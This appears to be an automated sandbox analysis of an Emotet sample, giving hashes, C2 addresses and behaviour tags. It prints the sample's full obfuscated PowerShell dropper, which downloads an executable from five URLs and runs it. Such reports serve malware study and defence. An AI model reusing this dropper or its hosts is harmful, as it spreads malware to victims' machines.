General

  • Target

    Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.46

  • Size

    165KB

  • Sample

    191212-643d4j98xx

  • MD5

    cc7d6d8e28fce962e81a6ba5c82f29bb

  • SHA1

    c9aa3a171e86a9ddb186dcd2c092095ad4bd3df3

  • SHA256

    5df1f1341851c837a5892bd964c406fe101dd9154c3b5c1df36eb95372c604e0

  • SHA512

    81d6766797cb0e3e641c56dadc5cd15fa5aa1365d818f7f48ab65690264e92c11a234b077ad76559d8d24e29485e3ec27448dc155013c6f8a8d3595adf71cfb6

Malware Config

Extracted

Language
ps1
Source
$Ylpgdzmb='Ussbbmzhuhxke';$Lgedkkdqw = '177';$Izzqzhqztyz='Aidwjqnlcjxej';$Dbbskpwazvf=$env:userprofile+'\'+$Lgedkkdqw+'.exe';$Enhlkpqm='Ymcthcnjkuy';$Bywwmzypne=&('new'+'-o'+'bj'+'ect') NeT.WEBCLIEnT;$Fivlwlzoyuutl='http://acqua.solarcytec.com/rtsbgs/XiWmtYYur/*https://blog.learncy.net/wp-admin/user/oxZqQp/*http://hospitalsanrafael.ainimedina.com/wp-includes/vwf-i8ge-4445917/*https://sg771.kwikfunnels.com/phpmyadmin_bck/x9tfn-lv1h4-174129596/*http://www.siyinjichangjia.com/wp-content/WYszsP/'."S`PlIt"('*');$Unhcgqbmpfm='Rnfhjwbhl';foreach($Htccmlpcslkj in $Fivlwlzoyuutl){try{$Bywwmzypne."DowNlo`Adf`ILe"($Htccmlpcslkj, $Dbbskpwazvf);$Sugkuzifly='Cnjvacigqyalz';If ((&('G'+'et-Ite'+'m') $Dbbskpwazvf)."L`ENg`Th" -ge 22905) {[Diagnostics.Process]::"Sta`Rt"($Dbbskpwazvf);$Crgikwjlkq='Xhjheqdtzaa';break;$Wvtuvlrw='Tsenfeyl'}}catch{}}$Rjjptgiakk='Bfnbprpfaua'
URLs
exe.dropper

http://acqua.solarcytec.com/rtsbgs/XiWmtYYur/

exe.dropper

https://blog.learncy.net/wp-admin/user/oxZqQp/

exe.dropper

http://hospitalsanrafael.ainimedina.com/wp-includes/vwf-i8ge-4445917/

exe.dropper

https://sg771.kwikfunnels.com/phpmyadmin_bck/x9tfn-lv1h4-174129596/

exe.dropper

http://www.siyinjichangjia.com/wp-content/WYszsP/

Extracted

Family

emotet

Botnet

Epoch3

C2

190.146.14.143:443

85.235.219.74:80

78.187.204.70:80

46.105.128.215:8080

69.30.205.162:7080

192.161.190.171:8080

163.172.97.112:8080

86.98.157.3:80

113.52.135.33:7080

175.127.140.68:80

212.129.14.27:8080

200.41.121.69:443

143.95.101.72:8080

190.161.67.63:80

50.116.78.109:8080

37.46.129.215:8080

119.57.36.54:8080

212.112.113.235:80

46.105.131.68:8080

1.32.54.12:8080

rsa_pubkey.plain
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAMqZMACZDzcRXuSnj2OI8LeIYKrbUIXL
faUgIJPwYd305HnaBS2AfA0R+oPxT32r+3BbayI3KguqAn3E+rbwtLhqhOXOlTnY
7yvG4ufmwCCkRzc6Sq8baToxmd6y523AIQIDAQAB
-----END PUBLIC KEY-----

Targets

    • Target

      Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.46

    • Size

      165KB

    • MD5

      cc7d6d8e28fce962e81a6ba5c82f29bb

    • SHA1

      c9aa3a171e86a9ddb186dcd2c092095ad4bd3df3

    • SHA256

      5df1f1341851c837a5892bd964c406fe101dd9154c3b5c1df36eb95372c604e0

    • SHA512

      81d6766797cb0e3e641c56dadc5cd15fa5aa1365d818f7f48ab65690264e92c11a234b077ad76559d8d24e29485e3ec27448dc155013c6f8a8d3595adf71cfb6

    • Emotet

      Emotet is a trojan that is primarily spread through spam emails.

    • Executes dropped EXE

    • Windows security modification

    • Checks system information in the registry

      System information is often read in order to detect sandboxing environments.

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v6

Tasks
